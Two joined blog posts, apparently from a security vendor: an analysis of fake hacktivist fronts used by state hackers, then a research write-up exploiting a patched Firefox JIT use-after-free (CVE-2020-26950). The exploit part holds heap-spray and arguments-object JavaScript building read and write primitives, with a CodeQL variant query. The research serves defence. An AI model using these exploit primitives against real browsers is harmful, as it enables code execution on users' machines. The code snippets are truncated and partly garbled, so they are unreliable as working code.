The results of our analysis were first codified in the form of a CyberWarcon 2021 talk. In light of recent events, like the Partisans’ alleged use of ransomware to hinder Russian troop movements and a recent FBI report revisiting aspects of the Yemen Cyber Army, we felt it appropriate to spell out some insights and open mysteries.

State-Sponsored Knockoffs

In our 2016 paper, Brian Bartholomeow and I documented multiple instances of state-sponsored groups abusing hacktivist covers for their operations, focusing on two particular actors, Lazarus and Sofacy (APT28, STRONTIUM, FancyBear, etc.). Let’s briefly recap both.

Sony Pictures Entertainment hack claimed by Lazarus cover ‘Guardians of Peace’

The former resorted to this tactic early and often but did so poorly. Around 2015, it was easier to consider Lazarus a single grand threat cluster unified by a nexus of North Korean interest. Their operations against South Korean targets in 2012-2014 employed the cover of ‘hacktivist’ groups like ‘IsOne’, the ‘New Romantic Cyber Army’, and ‘WhoIs Team’.

Their more infamous cover, ‘Guardians of Peace’, became well-known for its involvement in the Sony Entertainment Pictures hack. Ultimately, all these hacktivist groups proved a thin and unconvincing disguise. They lacked any established pedigree and would lack any further operational continuity. They were abandoned just as quickly as the operations were carried out.

‘Anonymous Poland’ hack-and-leak amplification attempt by tweeting at researchers

On the other hand, Sofacy would prove far more dogged and successful in their use of hacktivism groups as cover. In some cases, they succeeded in fooling media outlets, victims, and researchers into thinking that they were dealing with hacktivist jihadis (CyberCaliphate) or pro-Russian Ukrainian security services (CyberBerkut).

While these outfits lacked much pedigree, they were nurtured over time and focused on objectives across different regions. Their efforts became sloppier during the summer of election hacks in 2016, employing outfits like the now infamous Guccifer 2.0, the lesser known @AnPoland, and even ultimately embracing one of their threat intelligence cryptonyms outright as the ‘FancyBears Hack Team’.

Beyond soft indicators like pedigree and continuity, threat intelligence researchers avidly tracking state-sponsored operations were in a position to correlate the leak phase of these operations with their respective earlier intrusion phases. For example, the attackers put effort into creating a hacktivist cover like @AnPoland to release documents stolen from the World Anti-Doping Agency (WADA) or the Court of Arbitration for Sport (Tas-Cas). Around the same time, Sofacy was seen registering WADA and Tas-Cas typosquatted domains for use in their phishing campaigns.

A possible coincidence? Sure. But we can add ‘overlap with a state-sponsored operation’ as another soft indicator in our assessment matrix for hacktivist covers.

These examples are practically ancient history in InfoSec years. We’re revisiting them precisely because the benefit of hindsight does a lot to dispel the confusion that accompanies fresh enemy incursions. For example, while we suspected that Yemen Cyber Army (YCA) was another Sofacy front due to a combination of soft indicators, Simin Kargar’s 2021 Cyberwarcon talk weighed the possibility of Iranian vs. Russian state-sponsorship behind YCA.

Simon Kargar notes the timeline of YCA activity related to the Iranian company Emennet Pasargad

With the timely release of the FBI’s report on Iranian-based company Emennet Pasargad (a.k.a. Eeleyanet Gostar), the benefit of hindsight may ultimately tip the scale in favor of Kargar’s Iranian hypothesis. The FBI connects Emennet Pasargad with both 2018 YCA activity as well as a 2020 U.S. voter intimidation and disinformation campaign under the cover of Proud Boys.

That said, keep in mind that the Yemen Cyber Army activity referenced occurs in 2018 and is not expressly linked back to the 2015 activity (as noted by Kargar). As she hints in her tweet, there’s always the possibility of yet another turn, a ‘knockoff’ hijacking the pedigree of this hacktivism cover for themselves.

‘Indra’, ‘Predatory Sparrow’, and ‘Adalat Ali’

More recently, we investigated the case of MeteorExpress, a previously unknown actor conducting wiper attacks across Syria and Iran since 2019. This brought back the question of inauthentic hacktivism as MeteorExpress activities were claimed by different short-lived, no pedigree ‘hacktivist’ groups under names like ‘Indra’, ‘Predatory Sparrow’, and possibly ‘Adalat Ali’.

Each appeared to have their own delimited campaigns, Telegram channels, social media accounts, and dropped stolen files via MEGA. The handling of the diverse fronts was inconsistent. Indra and Predatory Sparrow attacks were correlated by the use of slightly altered versions of MeteorExpress malware. Notably, there are even two separate Predatory Sparrow accounts, pointing to a possible hijack or something as embarrassing as a loss of credentials for the first.

We can at least say that inauthentic hacktivism is alive and well as a cover for action for state-sponsored attacks looking for a modicum of plausible deniability.

What Might Real Hacktivism Look Like?

Having discussed so many examples of fake hacktivism, we can distill the more useful soft indicators we’ve previously used in evaluating authentic hacktivism in a modern context.

  • Pedigree
    • Where did they come from? What have they done before?
  • Continuity
    • What happens after the initial attack?
  • Sourcing of Materials
    • How did they arrive at the materials pilfered or leaked?
  • Release Coordination
    • How are their released materials disseminated and amplified?
  • Cui bono
    • Who benefits? Who is negatively affected? Who should be negatively affected but isn’t?
  • Consistency of Objectives
    • Are the attackers consistently working towards their stated cause?
  • Secondary Effects
    • What effects are being courted? Media attention? Government response? Regional tensions?
  • Targeting
    • How are their targets selected? What prior knowledge would someone require to select or reach these targets?
  • Consistency
    • How well defined is the group? What ties one claim of ownership over a campaign to another? Is it a nebulous collective that different actors could hijack?

In the absence of hard technical indicators, these are some of the questions analysts should consider as they evaluate the authenticity of a hacktivism group. At this point, I’ll admit a tendency towards default skepticism, but we’d do well not to discount the possibility of a true homegrown asymmetrical threat.

Play Along at Home

For those analysts eager to try their hand at some of this analysis, there are multiple unsolved mysteries to choose from.

  • Lab Dookhtegan and GreenLeakers, two notorious groups sporadically leaking tools and materials allegedly belonging to Iranian APTs OilRig and MuddyWater, respectively.
    LabDookhtegan and GreenLeakers
  • SpiderZ, a mysterious group responsible for hacking the Al-Qard Al-Hassan financial organization and disclosing mechanisms used by Hezbollah to bypass U.S. sanctions in Lebanon.
    SpiderZ logo from their Anonymous-themed YouTube video
  • AgainstTheWest, a persona brought to my attention by Aaron DeVera during the CyberWarcon Q&A. ATW stages sporadic attacks against the Chinese government. DeVera recently published a profile of ATW.
  • IntrusionTruth, is a notorious outfit in the threat intelligence space. They intermittently release blogs profiling the individuals and companies behind different Chinese APTs with a decent level of detail substantiated via public sourcing or different telemetry services.
    IntrusionTruth logo consistent across their blog and Twitter account
  • ‘John Doe’ is purportedly the sole source behind the Panama Papers, claiming responsibility for the hack against Panamanian company Mossack Fonseca that set off the global tidal wave of revelations on the illicit use of offshore companies to hide wealth. Despite an initial mistaken arrest of a local employee, little is known about this attacker beyond their statement of intent. Further releases by the International Consortium of Investigative Journalists (ICIJ), titled ‘Pandora Papers’, have been more opaque about their sourcing, so what happened to John Doe?
  • Last, but most certainly not least, is the mythical ‘Phineas Fisher’.
    Sock puppet used to represent Phineas Fisher at their request during a Vice CyberWar interview

    While it’s hard to assess the authenticity or provenance of PF, they’re arguably the most successful modern hacktivist outfit with a confirmed kill under their belt –HackingTeam. PF gets their name from their first publicly attributed hack against Gamma Group (the makers of FinFisher) in 2014. They would then go on to breach HackingTeam so epically that they essentially left the company to slow bleed and ultimately shut down.

    ASCII art from one of Phineas Fisher’s HackBack Guides

    While PF is better known for these big hacks, they would also go on to release multiple hacking guides rife with Anarcho-Marxist references. The stated purpose being to empower others to follow in their footsteps and stand up to capitalist abuses. That mission would be further bolstered by hacks against the Mossos D’Esquadra police union of the Catalan Police, the AKP party in Turkey, and the Cayman Island National Bank and Trust. Consequently, PF set up the ‘Hacktivist Bug Hunting Program’, offering up to $100,000 in cryptocurrency as a reward for hacks against companies contributing to our ‘hypercapitalist dystopia’.

An Authentic Example?

Keen readers might note that I haven’t pointed to any groups as authentic modern hacktivist outfits. Rather than embrace skepticism entirely, I’ll go out on a limb and point to the recent rise of the Belarusian Cyber Partisans as a group with all the hallmarks of authentic hacktivist behavior, fully allowing for the possibility that I’ll end up eating my words. Let’s apply the metrics we’ve previously discussed.

Belarusian Cyber Partisans Logo

The Belarusian Cyber Partisans claim to be a collective of local system administrators fighting against the Lukashenko regime. Most of their attacks have focused on disclosures of stolen government information in the hopes of attracting further scrutiny on the practices of the incumbent leadership. By their own admission in private communications, the Partisans felt that the media were not paying enough attention to these revelations. They’ve now graduated to a new strategy of leveraging ransomware to disable strategically significant institutions, starting with the Belarusian Railways company (BCh) in an attempt to hinder Russian troop movements within Belarus and demanding the release of political prisoners.

Applying our soft indicators, we see the Partisans activity establishing a clear pedigree of activity and continuity of operations that’s continually emboldened but not suddenly enhanced by outsized capabilities. As reports are leaked detailing some of the means of their attacks, we see rather mundane technical indicators, largely abusing free services and commonly available tooling, though by their admission the alleged ransomware used at BCh is one they wrote (something we haven’t independently confirmed due to a lack of samples).

Union of Belarusian Security Officers

Most importantly, their limitations and tasking appear organic. They claim that in order to discover important government targets, they collaborate with a union of current and former Belarusian security officers (BYPOL) better acquainted with the inner workings of the government. That organic tasking stands in stark contrast to the example of MeteorExpress’ Indra campaign where a no pedigree ‘hacktivism’ group knew the exact companies allegedly supporting Iranian Revolutionary Guard Corps (IRGC) operations in Syria to hack-and-leak. This pinpoint targeting goes unexplained in the MeteorExpress narrative, and in most state-sponsored fly-by-night covers.

Signaling and Secondary Effects

There are reasons that we should foment greater analytic rigor when it comes to the authenticity of hacktivist operations. The use of a hacktivist cover goes hand-in-hand with the intention to release materials publicly and amplify a narrative for a given audience.

That’s a non-trivial change when it comes to state-sponsored operations, most of which are designed to remain undiscovered for as long as possible. Hack-and-leak operations are meant to court (selective or wide) attention and cause an effect. In the process, these groups are leveraging two audiences– security researchers and journalists.

Predatory Sparrow proactively messaging Western Media on gas pump attack

I’m afraid to say that we both prove susceptible conduits for different but similar reasons. We as security researchers are fascinated by new attacks, by the thrill of a new puzzle to put together. Our jobs often entail sharing information with other companies, reporting to governments, or publishing to as wide an audience as we have at our disposal. Similarly, journalists are always on the lookout for the next big story, they have editors and metrics. And neither group benefits from a wealth of time to scrutinize all aspects of a possible deception operation before amplifying it.

It’s easy to dismantle the ethical implications of our respective roles in these ops, but I think it’s important to sit with the discomfort and weigh (perhaps fruitlessly) how we might serve as more conscious stewards of the information we come across. We are not an incidental part of the dissemination aspect of these operations but a vital aspect, and we’d do well to act as a discerning one.

Concluding Thoughts

Hacktivism has come a long way from the late 90s and early 2000s years of nuisance hacks and naive collectives. If we distill what we’ve learned over the past decade of hacktivism abused as a cover for action, clear insights come into view:

  • State-sponsored groups use the guise of grassroots motivations not just for plausible deniability but also to imbue their leaks with legitimacy not afforded by the obvious intervention of a government.
  • Given the comparative volume of hacktivism ops that have turned out to be state-sponsored deception ops in the past ten years, we may also lean towards the conclusion that most hacktivism is used as a cover.
  • We actually struggle to narrow in on the examples of authentic hacktivism in the past decade, though it surely exists.
  • Our ability to assess these operations with certainty remains weak and is untimely compared to the speed with which their information is disseminated and amplified.

As a partial salve, we should hold steadfast to the attributes and soft indicators that have served us in determining the (in)authenticity of previous groups and apply them to these operations as they arise.

And for those avid practitioners and hungry analysts out there, it’s clear that the hacktivism space contains a wealth of unsolved mysteries to tackle.

Firefox JIT Use-After-Frees | Exploiting CVE-2020-26950

3 February 2022 at 16:30

Executive Summary

  • SentinelLabs worked on examining and exploiting a previously patched vulnerability in the Firefox just-in-time (JIT) engine, enabling a greater understanding of the ways in which this class of vulnerability can be used by an attacker.
  • In the process, we identified unique ways of constructing exploit primitives by using function arguments to show how a creative attacker can utilize parts of their target not seen in previous exploits to obtain code execution.
  • Additionally, we worked on developing a CodeQL query to identify whether there were any similar vulnerabilities that shared this pattern.



At SentinelLabs, we often look into various complicated vulnerabilities and how they’re exploited in order to understand how best to protect customers from different types of threats.

CVE-2020-26950 is one of the more interesting Firefox vulnerabilities to be fixed. Discovered by the 360 ESG Vulnerability Research Institute, it targets the now-replaced JIT engine used in Spidermonkey, called IonMonkey.

Within a month of this vulnerability being found in late 2020, the area of the codebase that contained the vulnerability had become deprecated in favour of the new WarpMonkey engine.

What makes this vulnerability interesting is the number of constraints involved in exploiting it, to the point that I ended up constructing some previously unseen exploit primitives. By knowing how to exploit these types of unique bugs, we can work towards ensuring we detect all the ways in which they can be exploited.

Just-in-Time (JIT) Engines

When people think of web browsers, they generally think of HTML, JavaScript, and CSS. In the days of Internet Explorer 6, it certainly wasn’t uncommon for web pages to hang or crash. JavaScript, being the complicated high-level language that it is, was not particularly useful for fast applications and improvements to allocators, lazy generation, and garbage collection simply wasn’t enough to make it so. Fast forward to 2008 and Mozilla and Google both released their first JIT engines for JavaScript.

JIT is a way for interpreted languages to be compiled into assembly while the program is running. In the case of JavaScript, this means that a function such as:

function add() {
	return 1+1;

can be replaced with assembly such as:

push    rbp
mov     rbp, rsp
mov     eax, 2
pop     rbp

This is important because originally the function would be executed using JavaScript bytecode within the JavaScript Virtual Machine, which compared to assembly language, is significantly slower.

Since JIT compilation is quite a slow process due to the huge amount of heuristics that take place (such as constant folding, as shown above when 1+1 was folded to 2), only those functions that would truly benefit from being JIT compiled are. Functions that are run a lot (think 10,000 times or so) are ideal candidates and are going to make page loading significantly faster, even with the tradeoff of JIT compilation time.

Redundancy Elimination

Something that is key to this vulnerability is the concept of eliminating redundant nodes. Take the following code:

function read(i) {
	if (i 

This would start as the following JIT pseudocode:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Get value of 'i'
6. Add 2 to GetValue5
7. Return Int32 Add6
8. Get value of 'i'
9. Add 1 to GetValue8
10. Return Add9 as an Int32

In this, we see that we get the value of argument i multiple times throughout this code. Since the value is never set in the function and only read, having multiple GetValue nodes is redundant since only one is required. JIT Compilers will identify this and reduce it to the following:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Add 2 to GetValue2
6. Return Int32 Add5
7. Add 1 to GetValue2
8. Return Add7 as an Int32

CVE-2020-26950 exploits a flaw in this kind of assumption.

IonMonkey 101

How IonMonkey works is a topic that has been covered in detail several times before. In the interest of keeping this section brief, I will give a quick overview of the IonMonkey internals. If you have a greater interest in diving deeper into the internals, the linked articles above are a must-read.

JavaScript doesn’t immediately get translated into assembly language. There are a bunch of steps that take place first. Between bytecode and assembly, code is translated into several other representations. One of these is called Middle-Level Intermediate Representation (MIR). This representation is used in Control-Flow Graphs (CFGs) that make it easier to perform compiler optimisations on.

Some examples of MIR nodes are:

  • MGuardShape - Checks that the object has a particular shape (The structure that defines the property names an object has, as well as their offset in the property array, known as the slots array) and falls back to the interpreter if not. This is important since JIT code is intended to be fast and so needs to assume the structure of an object in memory and access specific offsets to reach particular properties.
  • MCallGetProperty - Fetches a given property from an object.

Each of these nodes has an associated Alias Set that describes whether they Load or Store data, and what type of data they handle. This helps MIR nodes define what other nodes they depend on and also which nodes are redundant. For example, a node that reads a property will depend on either the first node in the graph or the most recent node that writes to the property.

In the context of the GetValue pseudocode above, these would have a Load Alias Set since they are loading rather than storing values. Since there are no Store nodes between them that affect the variable they’re loading from, they would have the same dependency. Since they are the same node and have the same dependency, they can be eliminated.

If, however, the variable were to be written to before the second GetValue node, then it would depend on this Store instead and will not be removed due to depending on a different node. In this case, the GetValue node is Aliasing with the node that writes to the variable.

The Vulnerability

With open-source software such as Firefox, understanding a vulnerability often starts with the patch. The Mozilla Security Advisory states:

CVE-2020-26950: Write side effects in MCallGetProperty opcode not accounted for
In certain circumstances, the MCallGetProperty opcode can be emitted with unmet assumptions resulting in an exploitable use-after-free condition.

The critical part of the patch is in IonBuilder::createThisScripted as follows:

IonBuilder::createThisScripted patch

To summarise, the code would originally try to fetch the object prototype from the Inline Cache using the MGetPropertyCache node (Lines 5170 to 5175). If doing so causes a bailout, it will next switch to getting the prototype by generating a MCallGetProperty node instead (Lines 5177 to 5180).

After this fix, the MCallGetProperty node is no longer generated upon bailout. This alone would likely cause a bailout loop, whereby the MGetPropertyCache node is used, a bailout occurs, then the JIT gets regenerated with the exact same nodes, which then causes the same bailout to happen (See: Definition of insanity).

The patch, however, has added some code to IonGetPropertyIC::update that prevents this loop from happening by disabling IonMonkey entirely for this script if the MGetPropertyCache node fails for JSFunction object types:

IonBuilder code to prevent a bailout-loop

So the question is, what’s so bad about the MCallGetProperty node?

Looking at the code, it’s clear that when the node is idempotent, as set on line 5179, the Alias Set is a Load type, which means that it will never store anything:

Alias Set when idempotent is true

This isn’t entirely correct. In the patch, the line of code that disables Ion for the script is only run for JSFunction objects when fetching the prototype property, which is exactly what IonBuilder::createThisScripted is doing, but for all objects.

From this, we can conclude that this is an edge case where JSFunction objects have a write side effect that is triggered by the MCallGetProperty node.

Lazy Properties

One of the ways that JavaScript engines improve their performance is to not generate things if not absolutely necessary. For example, if a function is created and is never run, parsing it to bytecode would be a waste of resources that could be spent elsewhere. This last-minute creation is a concept called laziness, and JSFunction objects perform lazy property resolution for their prototypes.

When the MCallGetProperty node is converted to an LCallGetProperty node and is then turned to assembly using the Code Generator, the resulting code makes a call back to the engine function GetValueProperty. After a series of other function calls, it reaches the function LookupOwnPropertyInline. If the property name is not found in the object shape, then the object class’ resolve hook is called.

Calling the resolve hook

The resolve hook is a function specified by object classes to generate lazy properties. It’s one of several class operations that can be specified:

The JSClassOps struct

In the case of the JSFunction object type, the function fun_resolve is used as the resolve hook.

The property name ID is checked against the prototype property name. If it matches and the JSFunction object still needs a prototype property to be generated, then it executes the ResolveInterpretedFunctionPrototype function:

The ResolveInterpretedFunctionPrototype function

This function then calls DefineDataProperty to define the prototype property, add the prototype name to the object shape, and write it to the object slots array. Therefore, although the node is supposed to only Load a value, it has ended up acting as a Store.

The issue becomes clear when considering two objects allocated next to each other:

If the first object were to have a new property added, there’s no space left in the slots array, which would cause it to be reallocated, as so:

In terms of JIT nodes, if we were to get two properties called x and y from an object called o, it would generate the following nodes:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. GuardShape of object 'o'
5. Slots of object 'o'
6. LoadDynamicSlot 'y' from slots5

Thinking back to the redundancy elimination, if properties x and y are both non-getter properties, there’s no way to change the shape of the object o, so we only need to guard the shape once and get the slots array location once, reducing it to this:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. LoadDynamicSlot 'y' from slots2

Now, if object o is a JSFunction and we can trigger the vulnerability above between the two, the location of the slots array has now changed, but the second LoadDynamicSlot node will still be using the old location, resulting in a use-after-free:


The final piece of the puzzle is how the function IonBuilder::createThisScripted is called. It turns out that up a chain of calls, it originates from the jsop_call function. Despite the name, it isn’t just called when generating the MIR node for JSOp::Call, but also several other nodes:

The vulnerable code path will also only be taken if the second argument (constructing) is true. This means that the only opcodes that can reach the vulnerability are JSOp::New and JSOp::SuperCall.

Variant Analysis

In order to look at any possible variations of this vulnerability, Firefox was compiled using CodeQL and a query was written for the bug.

import cpp
// Find all C++ VM functions that can be called from JIT code
class VMFunction extends Function {
   VMFunction() {
       this.getAnAccess().getEnclosingVariable().getName() = "vmFunctionTargets"
// Get a string representation of the function path to a given function (resolveConstructor/DefineDataProperty)
// depth - to avoid going too far with recursion
string tracePropDef(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | fc.getEnclosingFunction() = f and ((fc.getTarget().getName() = "DefineDataProperty" and result = f.getName().toString()) or (not fc.getTarget().getName() = "DefineDataProperty" and result = tracePropDef(depth + 1, fc.getTarget()) + " -> " + f.getName().toString())))
// Trace a function call to one that starts with 'visit' (CodeGenerator uses visit, so we can match against MIR with M)
// depth - to avoid going too far with recursion
Function traceVisit(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | (f.getName().matches("visit%") and result = f)or (fc.getTarget() = f and result = traceVisit(depth + 1, fc.getEnclosingFunction())))
// Find the AliasSet of a given MIR node by tracing from inheritance.
Function alias(Class c) {
   (result = c.getAMemberFunction() and result.getName().matches("%getAlias%")) or (result = alias(c.getABaseClass()))
// Matches AliasSet::Store(), AliasSet::Load(), AliasSet::None(), and AliasSet::All()
class AliasSetFunc extends Function {
   AliasSetFunc() {
       (this.getName() = "Store" or this.getName() = "Load" or this.getName() = "None" or this.getName() = "All") and this.getType().getName() = "AliasSet"
from VMFunction f, FunctionCall fc, Function basef, Class c, Function aliassetf, AliasSetFunc asf, string path
where fc.getTarget().getName().matches("%allVM%") and f = fc.getATemplateArgument().(FunctionAccess).getTarget() // Find calls to the VM from JIT
and path = tracePropDef(0, f) // Where the VM function has a path to resolveConstructor (Getting the path as a string)
and basef = traceVisit(0, fc.getEnclosingFunction()) // Find what LIR node this VM function was created from
and c.getName().charAt(0) = "M" // A quick hack to check if the function is a MIR node class
and aliassetf = alias(c) // Get the getAliasSet function for this class
and asf.getACallToThisFunction().getEnclosingFunction() = aliassetf // Get the AliasSet returned in this function.
and basef.getName().substring(5, c.getName().suffix(1).length() + 5) = c.getName().suffix(1) // Get the actual node name (without the L or M prefix) to match against the visit* function
and (asf.toString() = "Load" or asf.toString() = "None") // We're only interested in Load and None alias sets.
select c, f, asf, basef, path

This produced a number of results, most of which were for properties defined for new objects such as errors. It did, however, reveal something interesting in the MCreateThis node. It appears that the node has AliasSet::Load(AliasSet::Any), despite the fact that when a constructor is called, it may generate a prototype with lazy evaluation, as described above.

However, this bug is actually unexploitable since this node is followed by either an MCall node, an MConstructArray node, or an MApplyArgs node. All three of these nodes have AliasSet::Store(AliasSet::Any), so any MSlots nodes that follow the constructor call will not be eliminated, meaning that there is no way to trigger a use-after-free.

Triggering the Vulnerability

The proof-of-concept reported to Mozilla was reduced by Jan de Mooij to a basic form. In order to make it readable, I’ve added comments to explain what each important line is doing:

function init() {
   // Create an object to be read for the UAF
   var target = {};
   for (var i = 0; i 

Exploiting CVE-2020-26950

Use-after-frees in Spidermonkey don’t get written about a lot, especially when it comes to those caused by JIT.

As with any heap-related exploit, the heap allocator needs to be understood. In Firefox, you’ll encounter two heap types:

  • Nursery - Where most objects are initially allocated.
  • Tenured - Objects that are alive when garbage collection occurs are moved from the nursery to here.

The nursery heap is relatively straight forward. The allocator has a chunk of contiguous memory that it uses for user allocation requests, an offset pointing to the next free spot in this region, and a capacity value, among other things.

Exploiting a use-after-free in the nursery would require the garbage collector to be triggered in order to reallocate objects over this location as there is no reallocation capability when an object is moved.

Due to the simplicity of the nursery, a use-after-free in this heap type is trickier to exploit from JIT code. Because JIT-related bugs often have a whole number of assumptions you need to maintain while exploiting them, you’re limited in what you can do without breaking them. For example, with this bug you need to ensure that any instructions you use between the Slots pointer getting saved and it being used when freed are not aliasing with the use. If they were, then that would mean that a second MSlots node would be required, preventing the use-after-free from occurring. Triggering the garbage collector puts us at risk of triggering a bailout, destroying our heap layout, and thus ruining the stability of the exploit.

The tenured heap plays by different rules to the nursery heap. It uses mozjemalloc (a fork of jemalloc) as a backend, which gives us opportunities for exploitation without touching the GC.

As previously mentioned, the tenured heap is used for long-living objects; however, there are several other conditions that can cause allocation here instead of the nursery, such as:

  • Global objects - Their elements and slots will be allocated in the tenured heap because global objects are often long-living.
  • Large objects - The nursery has a maximum size for objects, defined by the constant MaxNurseryBufferSize, which is 1024.

By creating an object with enough properties, the slots array will instead be allocated in the tenured heap. If the slots array has less than 256 properties in it, then jemalloc will allocate this as a “Small” allocation. If it has 256 or more properties in it, then jemalloc will allocate this as a “Large” allocation. In order to further understand these two and their differences, it’s best to refer to these two sources which extensively cover the jemalloc allocator. For this exploit, we will be using Large allocations to perform our use-after-free.


In order to write a use-after-free exploit, you need to allocate something useful in the place of the previously freed location. For JIT code this can be difficult because many instructions would stop the second MSlots node from being removed. However, it’s possible to create arrays between these MSlots nodes and the property access.

Array element backing stores are a great candidate for reallocation because of their header. While properties start at offset 0 in their allocated Slots array, elements start at offset 0x10:

A comparison between the elements backing store and the slots backing store

If a use-after-free were to occur, and an elements backing store was reallocated on top, the length values could be updated using the first and second properties of the Slots backing store.

To get to this point requires a heap spray similar to the one used in the trigger example above:

   jitme - Triggers the vulnerability
function jitme(cons, interesting, i) {
   interesting.x1 = 10; // Make sure the MSlots is saved
   new cons(); // Trigger the vulnerability - Reallocates the object slots
   // Allocate a large array on top of this previous slots location.
   let target = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 489 to be close to the number of properties ‘cons’ has
   // Avoid Elements Copy-On-Write by pushing a value
   // Write the Initialized Length, Capacity, and Length to be larger than it is
   // This will work when interesting == cons
   interesting.x1 = 3.476677904727e-310;
   interesting.x0 = 3.4766779039175e-310;
   // Return the corrupted array
   return target;
   init - Initialises vulnerable objects
function init() {
   // arr will contain our sprayed objects
   var arr = [];
   // We'll create one object...
   var cons = function() {};
   for(i=0; i

Which gets us to this layout:

Before and after the use-after-free is exploited

At this point, we have an Array object with a corrupted elements backing store. It can only read/write Nan-Boxed values to out of bounds locations (in this case, the next Slots store).

Going from this layout to some useful primitives such as ‘arbitrary read’, ‘arbitrary write’, and ‘address of’ requires some forethought.

Primitive Design

Typically, the route exploit developers go when creating primitives in browser exploitation is to use ArrayBuffers. This is because the values in their backing stores aren’t NaN-boxed like property and element values are, meaning that if an ArrayBuffer and an Array both had the same backing store location, the ArrayBuffer could make fake Nan-Boxed pointers, and the Array could use them as real pointers using its own elements. Likewise, the Array could store an object as its first element, and the ArrayBuffer could read it directly as a Float64 value.

This works well with out-of-bounds writes in the nursery because the ArrayBuffer object will be allocated next to other objects. Being in the tenured heap means that the ArrayBuffer object itself will be inaccessible as it is in the nursery. While the ArrayBuffer backing store can be stored in the tenured heap, Mozilla is already very aware of how it is used in exploits and have thus created a separate arena for them:

Instead of thinking of how I could get around this, I opted to read through the Spidermonkey code to see if I could come up with a new primitive that would work for the tenured heap. While there were a number of options related to WASM, function arguments ended up being the nicest way to implement it.

Function Arguments

When you call a function, a new object gets created called arguments. This allows you to access not just the arguments defined by the function parameters, but also those that aren’t:

function arg() {
   return arguments[0] + arguments[1];


Spidermonkey represents this object in memory as an ArgumentsObject. This object has a reserved property that points to an ArgumentsData backing store (of course, stored in the tenured heap when large enough), where it holds an array of values supplied as arguments.

One of the interesting properties of the arguments object is that you can delete individual arguments. The caveat to this is that you can only delete it from the arguments object, but an actual named parameter will still be accessible:

function arg(x) {
   console.log(x); // 1
   console.log(arguments[0]); // 1

   delete arguments[0]; // Delete the first argument (x)

   console.log(x); // 1
   console.log(arguments[0]); // undefined


To avoid needing to separate storage for the arguments object and the named arguments, Spidermonkey implements a RareArgumentsData structure (named as such because it’s rare that anybody would even delete anything from the arguments object). This is a plain (non-NaN-boxed) pointer to a memory location that contains a bitmap. Each bit represents an index in the arguments object. If the bit is set, then the element is considered “deleted” from the arguments object. This means that the actual value doesn’t need to be removed and arguments and parameters can share the same space without problems.

The benefit of this is threefold:

  • The RareArgumentsData pointer can be moved anywhere and used to read the value of an address bit-by-bit.
  • The current RareArgumentsData pointer has no NaN-Boxing so can be read with the out-of-bounds array, giving a leaked pointer.
  • The RareArgumentsData pointer is allocated in the nursery due to its size.

To summarise this, the layout of the arguments object is as so:

The layout of the three Arguments object types in memory

By freeing up the remaining vulnerable objects in our original spray array, we can then spray ArgumentsData structures using recursion (similar to this old bug) and reallocate on top of these locations. In JavaScript this looks like:

// Global that holds the total number of objects in our original spray array
TOTAL = 0;
// Global that holds the target argument so it can be used later
arg = 0;
   setup_prim - Performs recursion to get the vulnerable arguments object
       arguments[0] - Original spray array
       arguments[1] - Recursive depth counter
       arguments[2]+ - Numbers to pad to the right reallocation size
function setup_prim() {
   // Base case of our recursion
   // If we have reached the end of the original spray array...
   if(arguments[1] == TOTAL) {
       // Delete an argument to generate the RareArgumentsData pointer
       delete arguments[3];
       // Read out of bounds to the next object (sprayed objects)
       // Check whether the RareArgumentsData pointer is null
       if(evil[511] != 0) return arguments;
       // If it was null, then we return and try the next one
       return 0;
   // Get the cons value
   let cons = arguments[0][arguments[1]];
   // Move the pointer (could just do cons.p481 = 481, but this is more fun)
   new cons();
   // Recursive call
   res = setup_prim(arguments[0], arguments[1]+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 480
   // If the returned value is non-zero, then we found our target ArgumentsData object, so keep returning it
   if(res != 0) return res;
   // Otherwise, repeat the base case (delete an argument)
   delete arguments[3];
   // Check if the next object has a null RareArgumentsData pointer
   if(evil[511] != 0) return arguments; // Return arguments if not
   // Otherwise just return 0 and try the next one
   return 0;
   main - Performs the exploit
function main() {
   arg = setup_prim(arr, i+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 480

Once the base case is reached, the memory layout is as so:

The tenured heap layout after the remaining slots arrays were freed and reallocated

Read Primitive

A read primitive is relatively trivial to set up from here. A double value representing the address needs to be written to the RareArgumentsData pointer. The arguments object can then be read from to check for undefined values, representing set bits:

   weak_read32 - Bit-by-bit read
function weak_read32(arg, addr) {
   // Set the RareArgumentsData pointer to the address
   evil[511] = addr;
   // Used to hold the leaked data
   let val = 0;
   // Read it bit-by-bit for 32 bits
   // Endianness is taken into account
   for(let i = 32; i >= 0; i--) {
       val = val = 0; i--) {
       val[0] = val[0] 

Write Primitive

Constructing a write primitive is a little more difficult. You may think we can just delete an argument to set the bit to 1, and then overwrite the argument to unset it. Unfortunately, that doesn’t work. You can delete the object and set its appropriate bit to 1, but if you set the argument again it will just allocate a new slots backing store for the arguments object and create a new property called ‘0’. This means we can only set bits, not unset them.

While this means we can’t change a memory address from one location to another, we can do something much more interesting. The aim is to create a fake object primitive using an ArrayBuffer’s backing store and an element in the ArgumentsData structure. The NaN-Boxing required for a pointer can be faked by doing the following:

  1. Write the double equivalent of the unboxed pointer to the property location.
  2. Use the bit-set capability of the arguments object to fake the pointer NaN-Box.

From here we can create a fake ArrayBuffer (A fake ArrayBuffer object within another ArrayBuffer backing store) and constantly update its backing store pointer to arbitrary memory locations to be read as Float64 values.

In order to do this, we need several bits of information:

  1. The address of the ArgumentsData structure (A tenured heap address is required).
  2. All the information from an ArrayBuffer (Group, Shape, Elements, Slots, Size, Backing Store).
  3. The address of this ArrayBuffer (A nursery heap address is required).

Getting the address of the ArgumentsData structure turns out to be pretty straight forward by iterating backwards from the RareArgumentsData pointer (As ArgumentsObject was allocated before the RareArgumentsData pointer, we work backwards) that was leaked using the corrupted array:

   main - Performs the exploit
function main() {
